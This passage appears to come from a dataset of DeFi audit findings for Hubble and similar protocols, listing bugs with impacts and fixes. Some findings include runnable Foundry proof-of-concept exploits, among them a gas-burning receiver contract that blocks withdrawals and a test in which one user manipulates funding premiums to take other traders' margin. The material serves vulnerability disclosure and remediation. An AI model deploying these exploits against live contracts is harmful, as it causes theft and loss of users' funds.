)\\n```\\n -Interested calculated is ampliefied by multiple of 1000 in `_debt_interest_since_last_update`чhighчInterest calculated in the `_debt_interest_since_last_update` function is amplified by multiple of 1000, hence can completely brick the system and debt calculation. Because we divide by PERCENTAGE_BASE instead of PERCENTAGE_BASE_HIGH which has more precision and which is used in utilization calculation.\\nFollowing function calculated the interest accured over a certain interval :\\n```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n\\nBut the results from the above function are amplified by factor of 1000 due to the reason that the intrest per second as per test file is calculated as following:\\n```\\n # accordingly the current interest per year should be 3% so 3_00_000\\n # per second that is (300000*10^18)/(365*24*60*60)\\n expected_interest_per_second = 9512937595129375\\n\\n assert (\\n expected_interest_per_second\\n == vault_configured.internal._current_interest_per_second(usdc.address)\\n )\\n```\\n\\nSo yearly interest has the precision of 5 as it is calculated using utilization rate and `PERCENTAGE_BASE_HIGH_PRECISION` is used which has precision of 5 .and per second has the precision of 18, so final value has the precision of 23.\\nInterest per second has precision = 23.\\nBut if we look at the code:\\n```\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n```\\n\\nWe divide by PERCENTAGE_BASE that is = 100_00 = precision of => 2 And than by PRECISION = 1e18 => precision of 18. So accumulated precision of 20, where as we should have divided by value precises to 23 to match the nominator.\\nWhere is we should have divided by PERCENTAGE_BASE_HIGH instead of PERCENTAGE_BASE\\nHence the results are amplified by enormous multiple of thousand.чUse PERCENTAGE_BASE_HIGH in division instead of PERCENTAGE_BASE.\\nEscalate for 10 USDC\\nThis should be high as described impact in the given submission and the duplicate too.\\nA magnitude of 1000 times of interest can be deemed as \"material loss of funds\".\\n141345\\nEscalate for 10 USDC The wrong calculation of interest rates will cause a direct loss of funds to users. This should definitely be high severity.\\nSame as above\\nhrishibhat\\nResult: High Has duplicates Considering this a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nNabeel-javaid: accepted\\ntwicek: acceptedчInterest are too much amplified, that impacts the total debt calculation and brick whole leverage, liquidation and share mechanism.\\nNote: Dev confirmed that the values being used in the tests are the values that will be used in production.ч```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n -Hedgers are not incentivized to respond to user's closing requestsчmediumчHedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.\\nHow `fillCloseRequest` function works?\\nFor a Long position, when PartyB (Hedger) calls the `fillCloseRequest` function to fill a close position under normal circumstances, the hedger cannot charge a spread because the hedger has to close at the user's requested close price (quote.requestedClosePrice),\\nIf the hedger decides to close at a higher price, it is permissible by the function, but the hedger will lose more, and the users will gain more because the users' profit is computed based on `long profit = closing price - opening price`.\\nUnder normal circumstances, most users will set the requested close price (quote.requestedClosePrice) close to the market price most of the time.\\nIn short, the `fillCloseRequest` function requires the hedger to match or exceed the user' requested price. The hedger cannot close at a price below the user's requested price in order to charge a spread.\\n```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n \"PartyBFacet: Closed price isn't valid\"\\n )\\n```\\n\\nHow `forceClosePosition` function works?\\nFor a Long position, the `forceCloseGapRatio` will allow the hedger to charge a spread from the user's requested price (quote.requestedClosePrice) when the user (PartyA) attempts to force close the position.\\nThe `upnlSig.price` is the market price and `quote.requestedClosePrice` is the price users ask to close at. By having the `forceCloseGapRatio`, assuming that `forceCloseGapRatio` is 5%, this will create a spread between the two prices (upnlSig.price and quote.requestedClosePrice) that represent a cost that the users (PartyA) need to \"pay\" in order to force close a position.\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n quote.requestedClosePrice +\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n ..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n```\\n\\nIssue with current design\\nAssume a hedger ignores the user's close request. In this case, the users (PartyA) have to call the `forceClosePosition` function by themselves to close the position and pay a spread.\\nThe hedgers can abuse this mechanic to their benefit. Assuming the users (PartyA) ask to close a LONG position at a fair value, and the hedgers respond by calling the `fillCloseRequest` to close it. In this case, the hedgers won't be able to charge a spread because the hedgers are forced to close at a price equal to or higher than the user's asking closing price (quote.requestedClosePrice).\\nHowever, if the hedger chooses to ignore the user's close request, this will force the user to call the `forceClosePosition,` and the user will have to pay a spread to the hedgers due to the gap ratio. In this case, the hedgers will benefit more due to the spread.\\nIn the long run, the hedgers will be incentivized to ignore users' close requests.чHedgers should not be entitled to charge a spread within the `forceClosePosition` function because some hedgers might intentionally choose not to respond to user requests in order to force the users to close the position themselves. In addition, hedgers are incentivized to force users to close the position themselves as the `forceClosePosition` function allows them the charge a spread.\\nWithin the `forceClosePosition` function, consider removing the gap ratio to remove the spread and fill the position at the market price (upnlSig.price).\\n```\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n// Add the line below\\n quote.requestedClosePrice, \\n// Remove the line below\\n quote.requestedClosePrice // Add the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n } else {\\n require(\\n upnlSig.price <=\\n// Add the line below\\n quote.requestedClosePrice,\\n// Remove the line below\\n quote.requestedClosePrice // Remove the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n \"PartyAFacet: Requested close price not reached\"\\n );\\n }\\n..SNIP..\\n// Remove the line below\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n// Add the line below\\n LibQuote.closeQuote(quote, filledAmount, upnlSig.price);\\n }\\n```\\n\\nFor long-term improvement to the protocol, assuming that the user's requested price is of fair value:\\nHedger should be penalized for not responding to the user's closing request in a timely manner; OR\\nHegder should be incentivized to respond to the user's closing request. For instance, they are entitled to charge a spread if they respond to user closing requests.чThe hedgers will be incentivized to ignore users' close requests, resulting in the users having to wait for the cooldown before being able to force close a position themselves. The time spent waiting could potentially lead to a loss of opportunity cost for the users.\\nIn addition, hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.ч```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n \"PartyBFacet: Closed price isn't valid\"\\n )\\n```\\n -ProcessWithdrawals is still DOS-ableчhighчDOS on process withdrawals were reported in the previous code4rena audit however the fix does not actually stop DOS, it only makes it more expensive. There is a much cheaper way to DOS the withdrawal queue - that is by specifying the `usr` to be a smart contract that consumes all the gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport \"./Utils.sol\";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n\\nCopy and paste this file into the test/foundry folder and run it.\\nThe test will not fail because foundry has a very high gas limit but you can see from the test that the amount of gas that was recorded in the malicious contract is higher than 30m (which is the current gas limit on ethereum). If you ran the test by specifying the —gas-limit i.e. `forge test -vvv --match-path test/foundry/VUSDRevert.t.sol --gas-limit 30000000` The test will fail with `Reason: EvmError: OutOfGas` because there is not enough gas to transfer to the malicious contract to run 150k iterations.чFrom best recommendation to worst\\nRemove the queue and `withdraw` the assets immediately when `withdraw` is called.\\nAllow users to process withdrawals by specifying the index index\\nAllow the admin to remove these bad withdrawals from the queue\\nAllow the admin to adjust the start position to skip these bad withdrawals.чUsers will lose their funds and have their VUSD burnt forever because nobody is able to process any withdrawals.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport \"./Utils.sol\";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n -Failed withdrawals from VUSD#processWithdrawals will be lost foreverчhighчWhen withdrawals fail inside VUSD#processWithdrawals they are permanently passed over and cannot be retried. The result is that any failed withdrawal will be lost forever.\\nVUSD.sol#L75-L81\\n```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n\\nIf the call to withdrawal.usr fails the contract will simply emit an event and continue on with its cycle. Since there is no way to retry withdrawals, these funds will be permanently lost.чCache failed withdrawals and allow them to be retried or simply send VUSD to the user if it fails.чWithdrawals that fail will be permanently lockedч```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n -Malicious user can frontrun withdrawals from Insurance Fund to significantly decrease value of sharesчmediumчWhen a user withdraws from the insurance fund, the value of their shares is calculated based on the balance of vUSD in the fund. Another user could deliberately frontrun (or frontrun by chance) the withdrawal with a call to `settleBadDebt` to significantly reduce the vUSD returned from the withdrawal with the same number of shares.\\nWhen a user wants to `withdraw` from the insurance pool they have to go through a 2 step withdrawal process. First they need to unbond their shares, and then they have to wait for the pre-determined unbonding period before they can `withdraw` the vUSD their shares are worth by calling `withdraw`.\\nWhen a user calls `withdraw` the amount of vUSD to redeem is calculated as:\\n```\\namount = balance() * shares / totalSupply();\\n```\\n\\nwhere `balance()` is the balance of vUSD in the contract and `totalSupply()` is the total supply of share tokens. Therefore, if the balance of vUSD in the contract were to decrease, then the amount of vUSD redeemed from the same number of shares would decrease as a result.\\nThis occurs when a trader's bad debt is settled when calling `settleBadDebt` in `MarginAccount.sol` as this calls `insuranceFund.seizeBadDebt` under the hood, which in turn calls `settlePendingObligation` which transfers vUSD out of the insurance fund to the margin account:\\n```\\nvusd.safeTransfer(marginAccount, toTransfer);\\n```\\n\\nThe result is now that the balance of vUSD in the insurance fund is lower and thus the shares are worth less vUSD as a consequence.чOne option would be to include a slippage parameter on the `withdraw` and `withdrawFor` methods so that the user redeeming shares can specify the minimum amount of vUSD they would accept for their shares.\\nWhen depositing into the insurance fund, the number of shares to mint is actually calculated based on the total value of the pool (value of vUSD and all other collateral assets). Therefore, the withdraw logic could also use `_totalPoolValue` instead of `balance()` to get a \"true\" value per share, however this could lead to withdrawals failing while assets are up for auction. Assuming all the assets are expected to be sold within the short 2 hour auction duration, this is probably the better solution given the pricing is more accurate, but it depends if users would accept failed withdrawals for short periods of time.чA user withdrawing from the insurance fund could receive significantly less (potentially 0) vUSD when finalising their withdrawal.ч```\\namount = balance() * shares / totalSupply();\\n```\\n -min withdraw of 5 VUSD is not enough to prevent DOS via VUSD.sol#withdraw(amount)чmediumчA vulnerability exists where a malicious user spam the contract with numerous withdrawal requests (e.g., 5,000). This would mean that genuine users who wish to withdraw their funds may find themselves unable to do so in a timely manner because the processing of their withdrawals could be delayed significantly.\\nThe issue stems from the fact that there is no restriction on the number of withdrawal requests a single address can make. A malicious actor could repeatedly call the withdraw or withdrawTo function, each time with a small amount (min 5 VUSD), to clog the queue with their withdrawal requests.\\n```\\n //E Burn vusd from msg.sender and queue the withdrawal to \"to\" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), \"min withdraw is 5 vusd\"); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n\\nGiven the maxWithdrawalProcesses is set to 100, and the withdrawal processing function processWithdrawals doesn't have any parameter to process from a specific index in the queue, only the first 100 requests in the queue would be processed at a time.\\n```\\n uint public maxWithdrawalProcesses = 100;\\n //E create array of future withdrawal that will be executed to return\\n function withdrawalQueue() external view returns(Withdrawal[] memory queue) {\\n //E check if more than 100 requests in withdrawals array\\n uint l = _min(withdrawals.length-start, maxWithdrawalProcesses);\\n queue = new Withdrawal[](l);\\n\\n for (uint i = 0; i < l; i++) {\\n queue[i] = withdrawals[start+i];\\n }\\n }\\n```\\n\\nIn the case of an attack, the first 100 withdrawal requests could be those of the attacker, meaning that the genuine users' requests would be stuck in the queue until all of the attacker's requests have been processed. Moreover the fact that we can only withdraw up to 1 day long when our withdraw request is good to go.чEither limit number of withdrawal requests per address could be a first layer of defense even if it's not enough but I don't see the point why this limit is included so removing it could mitigate this. Otherwise you could implement a priority queue regarding amount to be withdrawnчThis could result in significant delays for genuine users wanting to withdraw their funds, undermining the contract's usability and users' trust in the platform.ч```\\n //E Burn vusd from msg.sender and queue the withdrawal to \"to\" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), \"min withdraw is 5 vusd\"); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n -Malicious user can control premium emissions to steal margin from other tradersчmediumчA malicious user can force premiums to be applied in a positive direction for their positions. They can effectively steal margin from other traders that have filled the other side of their positions.\\nThis vulnerability stems from how the premiums are calculated when `settleFunding` is called in AMM.sol:\\n```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n\\nEffectively, the premium for a position is calculated based on the difference between the perpetual maker TWAP and the oracle TWAP. Under the hood, `getMarkPriceTwap` calls `_calcTwap`, which calculates the TWAP price from the last hour to the current block timestamp:\\n```\\n uint256 currentPeriodStart = (_blockTimestamp() / spotPriceTwapInterval) * spotPriceTwapInterval;\\n uint256 lastPeriodStart = currentPeriodStart - spotPriceTwapInterval;\\n\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n\\n /**\\n * check if there is any trade after currentPeriodStart\\n * since this function will not be called before the nextFundingTime,\\n * we can use the lastPeriodAccumulator to calculate the twap if there is a trade after currentPeriodStart\\n */\\n if (markPriceTwapData.lastTimestamp >= currentPeriodStart) {\\n // use the lastPeriodAccumulator to calculate the twap\\n twap = markPriceTwapData.lastPeriodAccumulator / spotPriceTwapInterval;\\n } else {\\n // use the accumulator to calculate the twap\\n uint256 currentAccumulator = markPriceTwapData.accumulator + (currentPeriodStart - markPriceTwapData.lastTimestamp) * markPriceTwapData.lastPrice;\\n twap = currentAccumulator / spotPriceTwapInterval;\\n }\\n```\\n\\nThis method works closely in conjunction with `_updateTWAP` which is called every time a new position is opened based on the fill price. I'll talk more about his in the \"Recommendation\" section, but the core issue is that too much weight is placed on the last price that was filled, along with the fact the user can open uncapped positions. As can be seen from the `_calcTwap` method above, if there has not been a recently opened position, then the TWAP is determined as the last filled price. And naturally, a time weighted price isn't weighted by the size of a fill as well, so the size of the last fill has no impact.\\nAs a result of this, a malicious user can place orders (which should then be executed by the validators) at a price that maximises the difference between the market TWAP and the oracle TWAP in order to maximise the premiums generated in the market. If the malicious user opens up a large enough position, the premiums generated exceed the taker/maker fees for opening positions. And since the same user can place orders for both sides of the market, they do not need to increase their margin requirement over time in order to meet the minimum margin requirements. Effectively the user is able to generate free revenue assuming the price of the underlying asset doesn't significantly deviate in the opposite direction of the large position held by the user.\\nBelow is a diff to the existing test suite with a test case that shows how a malicious user could control premiums to make a profit. It can be run with forge test -vvv --match-path test/foundry/OrderBook.t.sol:\\n```\\ndiff --git a/hubble-protocol/test/foundry/OrderBook.t.sol b/hubble-protocol/test/foundry/OrderBook.t.sol\\nindex b4dafdf..f5d36b2 100644\\n--- a/hubble-protocol/test/foundry/OrderBook.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/hubble-protocol/test/foundry/OrderBook.t.sol\\n@@ -228,6 // Add the line below\\n228,60 @@ contract OrderBookTests is Utils {\\n assertPositions(bob, -size, quote, 0, quote * 1e18 / stdMath.abs(size));\\n }\\n \\n// Add the line below\\n function testUserCanControlEmissions() public {\\n// Add the line below\\n uint256 price = 1e6;\\n// Add the line below\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n// Add the line below\\n\\n// Add the line below\\n // Calculate how much margin required for 100x MIN_SIZE\\n// Add the line below\\n uint256 marginRequired = orderBook.getRequiredMargin(100 * MIN_SIZE, price) * 1e18 / uint(defaultWethPrice) // Add the line below\\n 1e10; // required weth margin in 1e18, add 1e10 for any precision loss\\n// Add the line below\\n \\n// Add the line below\\n // Let's say Alice is our malicious user, and Bob is a normal user\\n// Add the line below\\n addMargin(alice, marginRequired, 1, address(weth));\\n// Add the line below\\n addMargin(bob, marginRequired, 1, address(weth));\\n// Add the line below\\n\\n// Add the line below\\n // Alice places a large legitimate long order that is matched with a short order from Bob\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, bobKey, MIN_SIZE * 90, price, true, false, MIN_SIZE * 90, false);\\n// Add the line below\\n\\n// Add the line below\\n // Alice's free margin is now pretty low\\n// Add the line below\\n int256 availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 200410, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n // Calculate what's the least we could fill an order for given the oracle price\\n// Add the line below\\n uint256 spreadLimit = amm.maxOracleSpreadRatio();\\n// Add the line below\\n uint minPrice = price * (1e6 - spreadLimit) / 1e6;\\n// Add the line below\\n\\n// Add the line below\\n // Alice can fill both sides of an order at the minimum fill price calculated above, with the minimum size\\n// Add the line below\\n // Alice would place such orders (and hopefully have them executed) just after anyone else makes an order in a period (1 hour)\\n// Add the line below\\n // The goal for Alice is to keep the perpetual TWAP as low as possible vs the oracle TWAP (since she holds a large long position)\\n// Add the line below\\n // In quiet market conditions Alice just has to make sure she's the last person to fill\\n// Add the line below\\n // In busy market conditions Alice would fill an order immediately after anyone else fills an order\\n// Add the line below\\n // In this test Alice fills an order every 2 periods, but in reality, if nobody was trading then Alice wouldn't have to do anything provided she was the last filler\\n// Add the line below\\n for (uint i = 0; i < 100; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n uint256 currentPeriodStart = (block.timestamp / 1 hours) * 1 hours;\\n// Add the line below\\n\\n// Add the line below\\n // Warp to before the end of the period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n 3590);\\n// Add the line below\\n \\n// Add the line below\\n // Place and execute both sides of an order as Alice\\n// Add the line below\\n // Alice can do this because once both sides of the order are executed, the effect to her free margin is 0\\n// Add the line below\\n // As mentioned above, Alice would place such orders every time after another order is executed\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, aliceKey, MIN_SIZE, minPrice, true, false, MIN_SIZE, false);\\n// Add the line below\\n \\n// Add the line below\\n // Warp to the start of the next period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n (3600 * 2) // Add the line below\\n 10);\\n// Add the line below\\n \\n// Add the line below\\n // Funding is settled. This calculates the premium emissions by comparing the perpetual twap with the oracle twap\\n// Add the line below\\n orderBook.settleFunding();\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // Alice's margin is now significantly higher (after just 200 hours) because she's been pushing the premiums in her direction\\n// Add the line below\\n availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 716442910, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testLiquidateAndExecuteOrder(uint64 price, uint120 size_) public {\\n vm.assume(price > 10 && size_ != 0);\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n```\\nчI originally thought the best way to mitigate this kind of attack is to scale the TWAP calculation based on the filled amount vs the total fill amount of the whole market. However the downside with this approach is that the fill amount will perpetually increase (given it's a perpetual market after all!) and so the market TWAP deviations from the oracle TWAP would decrease and so the premium emissions would also decrease over time. This could be argued as a feature in that early users receive a larger premium than later users.\\nUpon further thought I think the best way to prevent this kind of attack is simply to disincentivise the malicious user from doing so; by making this a net-loss situation. This can be done with a combination of the following:\\nIncreasing minimum order size\\nIncreasing trader/maker fees\\nIntroducing another fixed fee per order (rather than only variable rate fees)\\nCapping the maximum position size (both long and short)\\nReducing the maximum price deviation of fill prices from oracle price\\nIncreasing the minimum margin requirements\\nThis will vary per perpetual market, but the key thing that needs to be accomplished is that the cost to a user to place orders to control the market TWAP is greater than the premium that can be obtained from their position. This will also require some estimates as to how frequently users are going to be placing orders. If orders are relatively infrequent then increasing the TWAP calculation from 1 hour will also help with this.\\nIt is also worth considering whether the following lines in `_calcTwap` are overly weighted towards the last fill price:\\n```\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n```\\n\\nYou could make the argument that if no trades have occurred in a significant period of time then the market TWAP should revert back to the oracle TWAP and premium emissions should halt. This could either be after one empty period, or X number of empty periods to be defined by Hubble.\\nFinally, having a trader able to hold both sides of the same perpetual in the same order makes this attack easier to implement, so it might be worth adding an extra check to prevent this. However it's worth noting the same could be achieved with 2 accounts assuming they alternated the long/short positions between them to avoid excessive margin requirements. So I'm not sure this is strictly necessary.чA user can effectively steal funds from other traders that are filling the other side of their positions. The larger the position the malicious user is able to fill and the longer the period, the more funds can be credited to the malicious user's margin account.ч```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n -Malicious user can grief withdrawing users via VUSD reentrancyчmediumчVUSD#processWithdraw makes a call to withdrawal.usr to send the withdrawn gas token. processWithdrawals is the only nonreentrant function allowing a user to create a smart contract that uses it's receive function to deposit then immediately withdraw to indefinitely lengthen the withdrawal queue and waste large amounts of caller gas.\\nVUSD.sol#L69-L77\\n```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n\\nTo send the withdrawn gas token to the user VUSD#processWithdrawals utilizes a call with no data. When received by a contract this will trigger it's receive function. This can be abused to continually grief users who withdraw with no recurring cost to the attacker. To exploit this the attacker would withdraw VUSD to a malicious contract. This contract would deposit the received gas token then immediately withdraw it. This would lengthen the queue. Since the queue is first-in first-out a user would be forced to process all the malicious withdrawals before being able to process their own. While processing them they would inevitably reset the grief for the next user.\\nNOTE: I am submitting this as a separate issue apart from my other two similar issues. I believe it should be a separate issue because even though the outcome is similar the root cause is entirely different. Those are directly related to the incorrect call parameters while the root cause of this issue is that both mintWithReserve and withdraw/withdrawTo lack the reentrant modifier allowing this malicious reentrancy.чAdd the nonreentrant modifer to mintWithReserve withdraw and withdrawToчMalicious user can maliciously reenter VUSD to grief users via unnecessary gas wastageч```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n -Malicious users can donate/leave dust amounts of collateral in contract during auctions to buy other collateral at very low pricesчmediumчAuctions are only ended early if the amount of the token being auctioned drops to 0. This can be exploited via donation or leaving dust in the contract to malicious extend the auction and buy further liquidate collateral at heavily discounted prices.\\nInsuranceFund.sol#L184-L199\\n```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), \"IF.no_ongoing_auction\");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n auctions[token].startedAt = 0;\\n }\\n}\\n```\\n\\nWhen buying collateral from an auction, the auction is only closed if the balance of the token is 0. This can be exploited in a few ways to maliciously extend auctions and keep the timer (and price) decreasing. The first would be buy all but 1 wei of a token leaving it in the contract so the auction won't close. Since 1 wei isn't worth the gas costs to buy, there would be a negative incentive to buy the collateral, likely resulting in no on buying the final amount. A second approach would be to frontrun an buys with a single wei transfer with the same results.\\nNow that the auction has been extended any additional collateral added during the duration of the auction will start immediately well below the assets actual value. This allows malicious users to buy the asset for much cheaper, causing loss to the insurance fund.чClose the auction if there is less than a certain threshold of a token remaining after it has been bought:\\n```\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n+ uint256 minRemainingBalance = 1 * 10 ** (IERC20(token).decimal() - 3);\\n\\n // close auction if no collateral left\\n+ if (IERC20(token).balanceOf(address(this)) <= minRemainingBalance) {\\n auctions[token].startedAt = 0;\\n }\\n```\\nчUsers can maliciously extend auctions and potentially get collateral for very cheapч```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), \"IF.no_ongoing_auction\");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n auctions[token].startedAt = 0;\\n }\\n}\\n```\\n -MarginAccountHelper will be bricked if registry.marginAccount or insuranceFund ever changeчmediumчMarginAccountHelper#syncDeps causes the contract to refresh it's references to both marginAccount and insuranceFund. The issue is that approvals are never made to the new contracts rendering them useless.\\nMarginAccountHelper.sol#L82-L87\\n```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = 